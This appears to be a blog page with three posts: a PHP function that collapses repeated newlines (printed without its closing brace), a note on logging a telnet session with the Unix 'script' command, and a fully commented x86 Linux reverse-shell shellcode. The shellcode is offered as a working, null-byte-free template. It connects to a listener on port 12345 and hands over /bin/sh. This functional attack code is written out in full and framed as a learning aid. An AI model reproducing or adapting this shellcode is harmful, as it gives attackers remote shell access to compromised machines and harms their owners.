x86 reverse shellcode documented example

Writing a shellcode is hard, documented references are scarce and figuring out how to translate function calls into assembly is a pain. I’m posting here a shellcode I wrote a while back. It’s not a perfect example, it can be shorter and more elegant, but it works and does not contain null bytes – It should get you started if you need help writing your own variety of shellcode.

This is a reverse shell code, it will connect back to on port 12345 hoping to find a listening server and provide a shell.

# x86 linux reverse shellcode example
# aviran.org
xor eax, eax        # setting eax,ebx,edx to zero
xor ebx, ebx
xor edx, edx
push 0x6            # pushing 6,1,2 to the stack
push 0x1            # these are the values for
push 0x2            # socket(2,1,6)
mov ecx, esp        # set args for call
mov bl, 1           # 1 means socket()
mov al, 0x66        # 0x66 means sys-socket
int 0x80            # call socket()
mov esi, eax        # sockfd
xor ebx, ebx        # ebx = 0
xor ecx, ecx        # ebx = 0
xor edx, edx        # ebx = 0
mov al, 0x66        # socket syscalls
push ebx            # padding
push ebx            # padding
mov bl, 0x3         # ebx = 3 = connect()
mov dl,0x1          # pushing sockaddr_in into memory
shl edx,24          # IP,Port,AF_INET, cant push word so pushing port and AF_INET together
mov dl,0x7f         # setting edx to be 0x0100007f -
push edx
xor edx,edx         # setting edx to be 0x39300002 - port 12345, AF_INET
mov dx,0x3930       # this is done to avoid null bytes
shl edx,16
mov dl,0x2
push edx
mov ecx, esp        # saving location of struct
                    # args for connect
push 0x10           # 0x10 size of struct
push ecx            # ecx - pointer to struct
push esi            # esi sockfd
mov ecx, esp       
int 0x80            # call connect
xor eax, eax
xor ebx,ebx
xor ecx,ecx
mov ebx,esi         # sockfd
mov al,0x3f         # dup2
mov cl, 0x2         # ecx = 2 = stderr
int 0x80            # call dup2()
xor eax, eax
mov al,0x3f
dec cl              # cl = 1 = stdout
int 0x80            # call dup2
xor eax, eax
mov al,0x3f
dec cl              # cl = 0 = stdin
int 0x80            # call dup2
xor eax,eax         #
xor ecx,ecx         #
xor edx,edx         #
mov al,11           # execve
push edx            # push 0 for end of string
push 0x68732f6e     # pushing //bin/sh
push 0x69622f2f
mov ebx, esp        # pointer to string
push edx            # push null
mov edx,esp         # edx is third var, gets null
push ebx            # push var to stack
mov ecx,esp         # set second variable
int 0x80            # make the call

PHP – Collapse multiple line drops to a single line drop

If you need to clean up some input by removing multiple new line drops and replace it with a single new line drop, for example, making this piece of text:

Lorem ipsum dolor sit amet,

consectetur adipiscing elit.

Aliquam ac elit at elit viverra mollis.

Cras tincidunt leo eleifend purus fermentum.

Look like this:

Lorem ipsum dolor sit amet,
consectetur adipiscing elit.
Aliquam ac elit at elit viverra mollis.
Cras tincidunt leo eleifend purus fermentum.

The following PHP function will remove the consecutive new line characters.

function collapseNewLines($str) {
	return  preg_replace('/((\r?)\n)+/', "\n", $str);

Windows/DOS new line is represented by the two characters \r\n and UNIX like systems use only the single char \n . The function handle both cases.
If you find it useful, a link to this blog would be nice 🙂

Logging telnet (Or anything else on a Linux/Unix shell)

I had some web server acting funny the other day so I decided to go Rambo style and get a page manually using telnet. I also wanted to save the output of the entire client/server negotiation for later analysis.
The Unix command script is just for that, it will run telnet (or any other shell command) for you and and allow you to work with it while capturing the standard input and output.

$ script -c "telnet www.aviran.org 80" output.txt
Script started, file is output.txt
Connected to www.aviran.org.
Escape character is '^]'.

GET / HTTP/1.1
HOST: www.aviran.org
[Hit Enter Twice]
Connection closed by foreign host.
Script done on Thu 15 Dec 2011 11:23:14 AM IST


After running script with the appropriate parameters, telnet connects to the server. Lines 7-9 are what I send to the server in order to fetch the root HTML page (You have to hit enter twice to end the input).
When telnet ends, the output.txt file will contain the entire input and output that was send to and from telnet.